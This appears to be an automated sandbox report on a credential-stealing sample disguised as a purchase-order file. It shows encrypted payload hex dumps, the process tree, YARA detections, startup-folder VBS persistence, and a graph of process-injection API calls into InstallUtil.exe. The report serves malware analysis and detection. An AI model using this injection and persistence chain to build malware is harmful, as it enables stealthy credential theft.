                                                        2025-01-09 17:57:16 UTC8000INData Raw: 0b eb 2f 8d f9 b9 cd f9 4c 18 4f 71 c7 39 d9 19 da f4 39 9b 25 91 f8 2a 01 81 f8 10 84 8d 46 9e 12 d3 62 f7 f6 42 19 42 69 3e 63 23 9c 55 44 dd bc d6 a5 22 c2 0e 3e ab 14 48 12 32 d3 4f 24 0a 6e 95 b5 55 07 da 4c b9 5c 4a f6 d8 ba e1 ee c6 64 2c cc 83 e1 57 33 32 7a 39 9f f6 4d 10 62 3f 7b fc 76 91 0d b2 1a f3 e3 8c 78 d3 8d fc 6d 54 fb 66 c1 aa 4c e4 ad 3b 69 5d aa 56 dc 22 79 a1 be 79 09 a9 7b d7 90 0d 38 97 d3 f6 f5 88 c9 cf 7b 89 38 cf 9a df e7 5d 50 31 a1 a4 8f 11 32 bb 9a 50 d1 74 54 9e 77 96 ff 46 eb 7c 3f 5f ee 77 09 e1 1a 00 f0 bf ab 8d 1e 77 a6 40 d0 0d 81 44 46 92 9d b2 a0 d1 fb 0e 78 b9 62 51 4d ba d9 d9 7f 33 35 e4 69 3b 3d 12 af df b4 1d e8 37 27 8b b8 4c 86 93 7b 5a 70 1a d0 35 54 6e 39 f2 87 07 16 19 ce 54 fb 36 a4 64 50 4a c5 bb d3 9e 6e
                                                        Data Ascii: /LOq99%*FbBBi>c#UD">H2O$nUL\Jd,W32z9Mb?{vxmTfL;i]V"yy{8{8]P12PtTwF|?_ww@DFxbQM35i;=7'L{Zp5Tn9T6dPJn
                                                        2025-01-09 17:57:16 UTC8000INData Raw: 2a 3a c6 a9 a4 a6 03 f5 e2 d3 7e 3c f5 95 1d d1 b8 54 ec a0 54 49 dd d6 59 7c b2 3c d1 04 e5 94 77 e3 89 c2 69 70 b4 39 03 c8 72 e9 89 d2 ed 17 fb 45 a3 68 e8 e0 98 11 cb 17 68 0f 0e a7 e0 2d 5b 52 f8 ff f2 4d d7 95 12 3d 35 34 bb 04 cb 56 f5 81 c8 58 07 2d 4e c9 a9 45 84 45 8d 35 d8 63 2b ec 9d 1e ed e7 b8 a8 99 17 ed 19 81 5e 35 6d 9a c5 70 4d 9a b1 66 db b0 61 b6 83 18 4d bd eb 21 1d 16 83 37 9d 7f af 88 55 7b 78 f4 a3 7a c6 d6 11 4d 07 15 61 a8 c2 6e a4 57 7f 45 80 ce 37 fe 34 af 99 23 70 e8 23 79 84 f7 ae 97 23 9e a9 94 43 a7 66 e3 78 1b 01 ec 9a ae 9d 2b 38 49 1d 0e 25 83 a2 d2 41 eb 5a f8 fc a8 b4 45 82 2b 98 fc 4a 0d 6c 8b c4 9a 9c 38 d8 e5 01 a7 54 72 39 a3 89 2e 30 27 d6 ee df b9 06 d8 60 b4 e2 56 08 aa 92 8d f2 8d 33 fd e0 b3 0f a8 dd ff be f1
                                                        Data Ascii: *:~<TTIY|<wip9rEhh-[RM=54VX-NEE5c+^5mpMfaM!7U{xzManWE74#p#y#Cfx+8I%AZE+Jl8Tr9.0'`V3
                                                        2025-01-09 17:57:16 UTC8000INData Raw: bd b0 8e c4 d2 2b 47 bf b5 9b 5d 86 f3 63 6e d8 44 2d e1 64 6e cf 11 57 b5 3a de 6e 96 4b 0d fc 83 dd ef 37 a6 d7 21 10 a2 95 35 94 b1 7a 06 28 8a 8a d9 11 41 a7 2e b1 90 98 52 a8 c5 76 8d 89 9b 0e 13 9e 0f 22 f5 be d1 f3 2a 6f 41 1a 28 9d 77 3d aa cc f4 f3 2e e4 fe e7 bb 49 be 64 34 25 dd 6b 31 8b 93 16 b1 04 c7 c7 5a ba 3f b8 bd b4 33 0c e1 5b 17 95 4e b8 26 86 8a 04 e1 5e 2b fa 3a ab fb d6 be 92 0c d7 12 1f 82 52 30 5f fe 0b 06 ba 11 84 dc 00 8e 23 bc 40 b8 51 fa 2d 51 66 9e 7c e5 69 f5 dc 2f 27 f1 0a d1 3a 89 2d 5e b4 8e 2d 20 a1 34 2f f8 a2 8b a5 1e e6 9f 7a d4 1e f1 2e c9 b1 d4 8d 6c 49 aa 61 95 23 86 5d 76 90 f4 57 1b f4 a5 69 5c 4f 94 7f 41 c8 80 43 8a e1 80 05 9d 9b 6b bb cd d9 00 d4 bb b7 1c 50 bc 98 44 a8 0e e4 31 9e 53 56 33 3b 22 99 e9 ac 8c
                                                        Data Ascii: +G]cnD-dnW:nK7!5z(A.Rv"*oA(w=.Id4%k1Z?3[N&^+:R0_#@Q-Qf|i/':-^- 4/z.lIa#]vWi\OACkPD1SV3;"
                                                        2025-01-09 17:57:16 UTC8000INData Raw: 18 5f 26 38 49 d3 8b 55 7a a8 63 80 c7 a2 a8 27 3b df 2a f2 34 17 65 52 b6 c3 26 44 af 3e 62 97 cf e3 9c 52 14 26 d9 94 f5 aa d1 e3 e7 90 9d 4a 4f a5 aa b9 3b 28 e7 c5 c8 78 be 58 10 07 29 00 6e 8f 5a 5e 70 fd ec a0 94 43 82 02 b8 81 1e bd a7 ea 51 67 d7 5e 88 8f bc a8 c3 01 2b 24 e6 77 86 27 b1 90 49 a2 4b 9d fa c8 b3 40 23 c0 7d fa b7 1b c6 67 01 67 fb 0b 83 6a cd e9 bb 37 a9 23 df 66 42 3b 93 f5 28 d8 45 62 fe 52 85 a3 d3 db 37 d6 21 d6 5b 6a 7f c5 62 39 fc 92 9c a1 92 e2 4f fa 08 4e ab e6 9b 29 ca 3b b5 d6 af 1e 01 6f 56 7d a7 a6 e6 7a 9a 7c 46 e4 53 87 96 bf ea 6e 31 1c 95 c3 ec 5c 43 e0 8e 3c 50 ee 5a c0 38 21 c7 7f 0a 21 3c f9 f7 8a 74 86 24 b5 7a b2 e3 e1 0c e2 85 d1 5d 48 35 4e e1 4d 3b 2b bc 11 74 3a 16 ff 16 43 87 66 18 47 01 59 b3 50 94 f5 39
                                                        Data Ascii: _&8IUzc';*4eR&D>bR&JO;(xX)nZ^pCQg^+$w'IK@#}ggj7#fB;(EbR7![jb9ON);oV}z|FSn1\C<PZ8!!<t$z]H5NM;+t:CfGYP9
                                                        2025-01-09 17:57:17 UTC8000INData Raw: 44 28 d8 9f ab ef c5 71 cc 06 e3 6c 19 d5 ea eb 36 7b e3 73 8c 64 8a 12 35 34 fb 20 3e 93 4c 51 73 83 e0 57 58 af 57 94 97 30 73 b2 24 02 93 06 ee 29 5a ce 7b a4 7e d5 41 fc 7e 46 98 69 6d 44 8c 87 c0 ef 99 54 57 0c 8f a3 c6 de 96 b4 d9 be 2e 70 f4 b2 5e 31 92 af ce 51 ca 56 1b 58 bc 6f 05 63 ee 7e 6c 86 d8 7d ff b5 a9 59 5e 5a ef ac 6e 3f ab 88 95 ed e5 7f f0 39 64 83 fc d4 a8 c1 43 8e 4d c9 b2 01 59 96 fd ad 84 ad 9f 09 98 17 e6 6b 01 f3 1d 7e b8 d9 90 60 28 58 c2 f1 d0 49 da 69 b7 0f 74 8c 80 e9 d7 a5 97 8d 73 ff 22 f3 40 e6 59 ff 43 87 f4 98 68 6b f1 72 07 b2 40 3e 55 3c c9 c4 54 87 30 c5 c6 16 be 13 c9 0e f5 bf dd 68 f9 3a d0 5f 8b ea 1c c8 b5 a3 32 b2 34 82 6a 8e c4 d7 4b ce 3f fb 1a e5 dc d5 34 cd 20 cf e6 bb e4 96 3d ff 51 67 61 29 47 ed b0 79 40
                                                        Data Ascii: D(ql6{sd54 >LQsWXW0s$)Z{~A~FimDTW.p^1QVXoc~l}Y^Zn?9dCMYk~`(XIits"@YChkr@>U<T0h:_24jK?4 =Qga)Gy@
                                                        2025-01-09 17:57:17 UTC8000INData Raw: 72 0c fb b9 d0 de fe 67 3d 5d c1 1e 31 bb 59 c8 74 26 3d 54 6f 6c df 06 1e 01 19 a3 4f f0 19 68 39 3d 19 18 df 9a 0f dd 05 7b c9 a9 b4 0f 9c 10 6d 14 1d 95 2f c0 1e 17 ef 20 5e d7 87 0f df 78 ed 5b 47 2c ad f4 31 97 87 f0 c3 b3 21 e4 da 51 bd 97 25 e4 d5 85 6f f0 3e e6 73 33 62 27 b4 cf 70 71 78 79 bd 87 0e 10 f5 88 61 c1 ce 9b 68 ab 4a a3 c0 ed 2f 4b 76 54 17 49 8f af 46 f2 17 af 51 c2 33 c7 5d e4 54 e5 0d 05 2d e7 9f 57 87 7d 29 a8 3d 57 87 ac 00 6a bd bc 3f d8 71 b0 93 77 bf 65 82 32 63 70 06 3a 3d e7 95 2e 40 a7 2d 42 a0 34 9c c9 5a 98 3d be 19 26 5d a4 e9 38 ee 06 d8 bc bd 91 f4 e3 ad 48 ff f2 03 2c 51 9a ad 67 c0 e0 74 b1 33 a5 38 16 4a e4 54 e3 97 fc 51 8e e7 be e3 10 18 bf 65 68 17 66 46 f2 f6 0e 63 ea 20 4f d1 4c 73 a3 39 6f 22 90 7c 81 6d e1 c1
                                                        Data Ascii: rg=]1Yt&=TolOh9={m/ ^x[G,1!Q%o>s3b'pqxyahJ/KvTIFQ3]T-W})=Wj?qwe2cp:=.@-B4Z=&]8H,Qgt38JTQehfFc OLs9o"|m
                                                        2025-01-09 17:57:17 UTC8000INData Raw: 31 34 73 09 6e 1d 20 25 f6 de 83 20 f0 72 d1 a0 79 f5 98 53 70 bf b0 a0 1d f7 3c 8f 1d 3d 9a 79 49 6c f1 d8 e9 50 65 70 e9 9c bd a4 2f 51 8c 79 75 60 22 18 bb 9e f3 c2 84 18 66 e8 ae 8a eb b6 1a b0 75 11 70 e0 a2 82 0f ce 14 3e 35 39 81 24 c0 10 1a 3c 5d 79 25 b4 a2 f1 a0 70 0b c4 52 de f8 f8 ae d5 99 0d 83 17 ff 63 22 e1 88 9d 63 ae 79 1d 2e 3e 9a 20 35 98 c5 45 b9 81 02 f7 76 a3 5e 90 03 60 44 ab a4 21 48 56 0a bd c1 f0 ce 99 70 de 3d 2c 57 b8 04 67 61 1e e6 65 1a f7 3d 91 95 7d 26 ef ad 59 e4 7d 84 ce 5d 50 9b f0 28 c2 dd 15 e1 97 67 52 00 c5 d5 44 61 9c 00 fe 91 63 d9 a9 2d a8 f4 d3 e3 c7 06 76 a9 a7 22 4e e2 9b bf 7b a7 49 b3 2a 17 ab 85 75 b7 42 d0 96 c2 db 71 d2 cb 42 5a 20 dc a9 d7 bc 12 83 a1 78 5f 3e bf 1b f1 5b da 0f 7b 0f c0 92 7d ec be 6d d7
                                                        Data Ascii: 14sn % rySp<=yIlPep/Qyu`"fup>59$<]y%pRc"cy.> 5Ev^`D!HVp=,Wgae=}&Y}]P(gRDac-v"N{I*uBqBZ x_>[{}m
                                                        2025-01-09 17:57:17 UTC8000INData Raw: e4 1d 1b 40 80 1b 40 3e 1e 3b 58 03 6b fd b4 2c 46 e8 1c e4 4f af 85 16 3b c4 05 a2 9f 7a 43 14 0b 9d 3a ec b3 31 9a 73 7b 89 20 8c 80 66 67 44 6a 79 75 ec 18 df d7 f8 b1 bc 71 a3 1b 8c f1 71 5a c0 f8 bc 0c ab 97 4d 86 e3 d0 d4 5c 3f 17 1a 76 f4 e6 05 bc 58 10 6a 7d 32 d0 dc 62 8b 07 ec 7e f8 1e a6 fb 67 4b a8 c5 1e ef ac b7 62 cf f1 8f 2f 40 d9 7a 22 b1 24 ed 17 63 bf 97 5a 49 3f 8a 8e 74 a6 5a c7 03 9b 6f 29 47 14 6b 18 de f1 b2 e1 84 55 94 de 62 fa 74 4f 02 5c 00 4e 81 b3 38 0e c4 f9 17 c6 b9 25 ac ec 8b a5 41 ec 79 39 fb a8 e1 ae 5c 47 46 9e bd d4 5b 1a 05 1b d3 31 a5 c4 3c dc 46 56 72 d6 b3 91 17 e0 0e 21 42 d6 ea b4 21 d5 5f 5d 2e a5 a4 b3 84 f0 6b e7 7c 8b b0 13 79 0c bc c2 95 e7 9e d1 cc 20 d3 ee 7e cf 79 b0 50 96 9b 68 90 f8 e0 cb ab 3b 64 7b 30
                                                        Data Ascii: @@>;Xk,FO;zC:1s{ fgDjyuqqZM\?vXj}2b~gKb/@z"$cZI?tZo)GkUbtO\N8%Ay9\GF[1<FVr!B!_].k|y ~yPh;d{0
                                                        2025-01-09 17:57:17 UTC8000INData Raw: 03 c0 d7 67 18 d9 87 53 4b 34 dc 3d a7 21 35 2c 34 ff d0 c2 b5 76 d3 d6 19 41 2f bf 3a a2 48 82 7f 7a 8b e6 c7 74 9a f5 31 4d c6 97 e1 49 0a 74 c9 7b cc 4b 4d f0 8a be f2 37 25 74 26 b3 99 f6 57 8d db 42 36 de 51 a8 59 4c a1 5a b4 a2 cf 3a 4d 1a 03 ef 7d 67 97 6a c1 dd 1c e9 b3 b0 27 92 b8 28 21 89 1a e8 2c 8e b2 72 35 55 09 2d 86 2e f8 65 54 db 8e 5e b7 e2 7c 38 36 68 2d a1 6a 65 dc 69 d9 89 cf 81 eb 8d 96 f3 3d cf 3e bd 1e 14 5c 2d e4 5c 9b 80 7d 3f 05 da 52 2e 52 fb f1 df e1 7f d0 31 ef b1 6b 0b ca 71 67 56 6f 9a 86 e5 aa b9 4e 51 f2 08 45 10 d5 ee 7e 28 3a 30 ce 8b da 21 fe 07 68 fd 11 3c 15 41 f2 92 b7 66 87 b1 c4 91 d6 9e f2 54 ed aa d4 26 f6 53 ea a9 ce 59 1a 36 ba e7 9e b9 a1 3b b5 ff 83 cd 31 e5 4e 30 b9 6a 51 c0 5d 47 b6 81 a6 41 03 c4 ef 23 58
                                                        Data Ascii: gSK4=!5,4vA/:Hzt1MIt{KM7%t&WB6QYLZ:M}gj'(!,r5U-.eT^|86h-jei=>\-\}?R.R1kqgVoNQE~(:0!h<AfT&SY6;1N0jQ]GA#X


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:12:56:51
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                                                        Imagebase:0x800000
                                                        File size:27'136 bytes
                                                        MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2157610900.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:12:57:05
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x5b0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:12:57:13
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                                                        Imagebase:0x7ff7174e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:12:57:14
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                                                        Imagebase:0xdb0000
                                                        File size:27'136 bytes
                                                        MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 68%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:12:57:27
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xa50000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:3.8%
                                                          Total number of Nodes:236
                                                          Total number of Limit Nodes:7
                                                          execution_graph 59832 67c1c88 59833 67c1cd6 NtProtectVirtualMemory 59832->59833 59835 67c1d20 59833->59835 59516 5af2088 59517 5af209d 59516->59517 59519 5af20b3 59517->59519 59521 5af4413 59517->59521 59526 5af3f8b 59517->59526 59522 5af3225 59521->59522 59523 5af3f93 59521->59523 59522->59519 59531 5af75b5 59523->59531 59535 5af75c0 59523->59535 59527 5af3f91 59526->59527 59529 5af75b5 CopyFileA 59527->59529 59530 5af75c0 CopyFileA 59527->59530 59528 5af3225 59528->59519 59529->59528 59530->59528 59532 5af7615 CopyFileA 59531->59532 59534 5af7717 59532->59534 59536 5af7615 CopyFileA 59535->59536 59538 5af7717 59536->59538 59539 5af8568 59540 5af857d 59539->59540 59541 5af8593 59540->59541 59543 5af88b4 59540->59543 59544 5af88be 59543->59544 59548 5af9f21 59544->59548 59553 5af9f30 59544->59553 59549 5af9f2e 59548->59549 59558 5afa287 59549->59558 59563 5afa497 59549->59563 59554 5af9f36 59553->59554 59556 5afa497 10 API calls 59554->59556 59557 5afa287 10 API calls 59554->59557 59555 5af8605 59555->59541 59556->59555 59557->59555 59559 5afa291 59558->59559 59568 5afa841 59559->59568 59582 5afa850 59559->59582 59560 5afa4de 59564 5afa4ab 59563->59564 59566 5afa841 10 API calls 59564->59566 59567 5afa850 10 API calls 59564->59567 59565 5afa4de 59566->59565 59567->59565 59569 5afa850 59568->59569 59581 5afa887 59569->59581 59596 5afae4d 59569->59596 59601 5afaeb2 59569->59601 59606 5afaf13 59569->59606 59611 5afb854 59569->59611 59616 5afba9a 59569->59616 59621 5afbcda 59569->59621 59626 5afb061 59569->59626 59631 5afb9e3 59569->59631 59637 5afb186 59569->59637 59642 5afb24b 59569->59642 59647 5afb3ac 59569->59647 59581->59560 59583 5afa865 59582->59583 59584 5afae4d 2 API calls 59583->59584 59585 5afb3ac 2 API calls 59583->59585 59586 5afb24b 2 API calls 59583->59586 59587 5afb186 2 API calls 59583->59587 59588 5afb9e3 4 API calls 59583->59588 59589 5afb061 2 API calls 59583->59589 59590 5afbcda 2 API calls 59583->59590 59591 5afba9a 2 API calls 59583->59591 59592 5afb854 2 API calls 59583->59592 59593 5afaf13 2 API calls 59583->59593 59594 5afaeb2 2 API calls 59583->59594 59595 5afa887 59583->59595 59584->59595 59585->59595 59586->59595 59587->59595 59588->59595 59589->59595 59590->59595 59591->59595 59592->59595 59593->59595 59594->59595 59595->59560 59598 5afae5c 59596->59598 59597 5afad23 59652 67c3ee0 59598->59652 59656 67c3ee8 59598->59656 59602 5afaec1 59601->59602 59604 67c3ee8 Wow64SetThreadContext 59602->59604 59605 67c3ee0 Wow64SetThreadContext 59602->59605 59603 5afaeed 59604->59603 59605->59603 59607 5afbd6d 59606->59607 59608 5afad23 59606->59608 59660 67c44e8 59607->59660 59664 67c44f0 59607->59664 59612 5afb85e 59611->59612 59614 67c44e8 VirtualAllocEx 59612->59614 59615 67c44f0 VirtualAllocEx 59612->59615 59613 5afad23 59614->59613 59615->59613 59617 5afbaa9 59616->59617 59668 67c37d8 59617->59668 59672 67c37d0 59617->59672 59618 5afad23 59622 5afb061 59621->59622 59623 5afad23 59621->59623 59676 67c4b38 59622->59676 59680 67c4b30 59622->59680 59627 5afb06b 59626->59627 59629 67c4b38 NtResumeThread 59627->59629 59630 67c4b30 NtResumeThread 59627->59630 59628 5afad23 59629->59628 59630->59628 59632 5afb9fb 59631->59632 59684 5afc538 59632->59684 59691 5afc4e3 59632->59691 59699 5afc533 59632->59699 59633 5afba13 59638 5afbd93 59637->59638 59640 67c44e8 VirtualAllocEx 59638->59640 59641 67c44f0 VirtualAllocEx 59638->59641 59639 5afad23 59640->59639 59641->59639 59643 5afb251 59642->59643 59645 67c37d8 WriteProcessMemory 59643->59645 59646 67c37d0 WriteProcessMemory 59643->59646 59644 5afb300 59644->59581 59645->59644 59646->59644 59648 5afb3bb 59647->59648 59650 67c37d8 WriteProcessMemory 59648->59650 59651 67c37d0 WriteProcessMemory 59648->59651 59649 5afad23 59649->59581 59650->59649 59651->59649 59653 67c3ee8 Wow64SetThreadContext 59652->59653 59655 67c3f75 59653->59655 59655->59597 59657 67c3f2d Wow64SetThreadContext 59656->59657 59659 67c3f75 59657->59659 59659->59597 59661 67c4530 VirtualAllocEx 59660->59661 59663 67c456d 59661->59663 59663->59608 59665 67c4530 VirtualAllocEx 59664->59665 59667 67c456d 59665->59667 59667->59608 59669 67c3820 WriteProcessMemory 59668->59669 59671 67c3877 59669->59671 59671->59618 59673 67c37d8 WriteProcessMemory 59672->59673 59675 67c3877 59673->59675 59675->59618 59677 67c4b80 NtResumeThread 59676->59677 59679 67c4bb5 59677->59679 59679->59623 59681 67c4b38 NtResumeThread 59680->59681 59683 67c4bb5 59681->59683 59683->59623 59685 5afc54f 59684->59685 59686 5afc571 59685->59686 59706 5afc71f 59685->59706 59711 5afcf11 59685->59711 59716 5afc798 59685->59716 59721 5afcafe 59685->59721 59686->59633 59692 5afc561 59691->59692 59693 5afc4ea 59691->59693 59694 5afc71f 2 API calls 59692->59694 59695 5afcafe 2 API calls 59692->59695 59696 5afc798 2 API calls 59692->59696 59697 5afc571 59692->59697 59698 5afcf11 2 API calls 59692->59698 59693->59633 59694->59697 59695->59697 59696->59697 59697->59633 59698->59697 59700 5afc539 59699->59700 59701 5afc571 59700->59701 59702 5afc71f 2 API calls 59700->59702 59703 5afcafe 2 API calls 59700->59703 59704 5afc798 2 API calls 59700->59704 59705 5afcf11 2 API calls 59700->59705 59701->59633 59702->59701 59703->59701 59704->59701 59705->59701 59707 5afc72e 59706->59707 59726 67c26dc 59707->59726 59730 67c26e8 59707->59730 59712 5afc5fc 59711->59712 59713 5afcb24 59711->59713 59713->59711 59734 67c2ac8 59713->59734 59738 67c2ac3 59713->59738 59717 5afc7c0 59716->59717 59719 67c26dc CreateProcessA 59717->59719 59720 67c26e8 CreateProcessA 59717->59720 59718 5afcbf2 59719->59718 59720->59718 59722 5afcb08 59721->59722 59723 5afc5fc 59722->59723 59724 67c2ac8 2 API calls 59722->59724 59725 67c2ac3 2 API calls 59722->59725 59724->59722 59725->59722 59727 67c274c CreateProcessA 59726->59727 59729 67c28d4 59727->59729 59731 67c274c CreateProcessA 59730->59731 59733 67c28d4 59731->59733 59735 67c2add 59734->59735 59742 67c3197 59735->59742 59739 67c2add 59738->59739 59741 67c3197 2 API calls 59739->59741 59740 67c2af3 59740->59713 59741->59740 59743 67c31a6 59742->59743 59745 67c37d8 WriteProcessMemory 59743->59745 59746 67c37d0 WriteProcessMemory 59743->59746 59744 67c2af3 59744->59713 59745->59744 59746->59744 59800 67d8790 59801 67d87a5 59800->59801 59805 67d8bd8 59801->59805 59810 67d8ba7 59801->59810 59802 67d87bb 59807 67d8c02 59805->59807 59806 67d8c46 59806->59802 59807->59806 59815 67dc6f8 59807->59815 59819 67dc6f1 59807->59819 59811 67d8bbd 59810->59811 59812 67d8c46 59811->59812 59813 67dc6f8 SleepEx 59811->59813 59814 67dc6f1 SleepEx 59811->59814 59812->59802 59813->59811 59814->59811 59816 67dc738 SleepEx 59815->59816 59818 67dc776 59816->59818 59818->59807 59820 67dc6f4 SleepEx 59819->59820 59822 67dc776 59820->59822 59822->59807 59823 67dc990 59824 67dc9a5 59823->59824 59827 67dcb11 59824->59827 59829 67dcb30 59827->59829 59828 67dc9bb 59829->59828 59830 67dd788 VirtualProtect 59829->59830 59831 67dd780 VirtualProtect 59829->59831 59830->59829 59831->59829 59747 10623d8 59748 10623f2 59747->59748 59749 1062402 59748->59749 59753 1064f16 59748->59753 59757 106a569 59748->59757 59762 1063894 59748->59762 59754 1064f35 59753->59754 59765 106fdb8 59754->59765 59758 106b715 59757->59758 59778 65a1198 59758->59778 59782 65a1189 59758->59782 59759 1063010 59764 106fdb8 2 API calls 59762->59764 59763 10638b2 59763->59749 59764->59763 59767 106fddf 59765->59767 59766 1063010 59770 65a0308 59767->59770 59774 65a0301 59767->59774 59771 65a0350 VirtualProtect 59770->59771 59773 65a038b 59771->59773 59773->59766 59775 65a0308 VirtualProtect 59774->59775 59777 65a038b 59775->59777 59777->59766 59779 65a11ad 59778->59779 59787 65a11d9 59779->59787 59783 65a1196 59782->59783 59784 65a1144 59782->59784 59786 65a11d9 2 API calls 59783->59786 59784->59759 59785 65a11c5 59785->59759 59786->59785 59789 65a120f 59787->59789 59788 65a11c5 59788->59759 59792 65a12e8 59789->59792 59796 65a12f0 59789->59796 59793 65a12f0 VirtualAlloc 59792->59793 59795 65a136a 59793->59795 59795->59788 59797 65a1330 VirtualAlloc 59796->59797 59799 65a136a 59797->59799 59799->59788

                                                          Executed Functions

                                                          Function 06603B0F Relevance: 16.1, Strings: 12, Instructions: 1147COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-3443518476
                                                          • Opcode ID: d7ef4e46103aba5fe5ff9312b2dec38056fbf2f41c81edce66a04fddea8db8cd
                                                          • Instruction ID: 992ce566c2443ab07fbaedc7512c278662a5901e278db15b165c5d05a60502f2
                                                          • Opcode Fuzzy Hash: d7ef4e46103aba5fe5ff9312b2dec38056fbf2f41c81edce66a04fddea8db8cd
                                                          • Instruction Fuzzy Hash: 06B20A34A00119DFEB68DF98C994BAEB7F6FF88300F1545A9E605AB3A4CB709D45CB50
                                                          Function 06603E47 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-324474496
                                                          • Opcode ID: 5a2c302b45d02fc220d874f95eae7fcd1f7679ef87b1bb78d1e4b19bc9f5b6cf
                                                          • Instruction ID: 3c29cda4ba24fcb4d6843f9ce343d96f5056d02a42b186e20cae7df33d02d19d
                                                          • Opcode Fuzzy Hash: 5a2c302b45d02fc220d874f95eae7fcd1f7679ef87b1bb78d1e4b19bc9f5b6cf
                                                          • Instruction Fuzzy Hash: 76220A34A00215DFEB68DF64C984BAAB7F6FF48304F1484A9D609AB3A5DB709D85CF50
                                                          Function 065A4C78 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                          Download Yara Rule

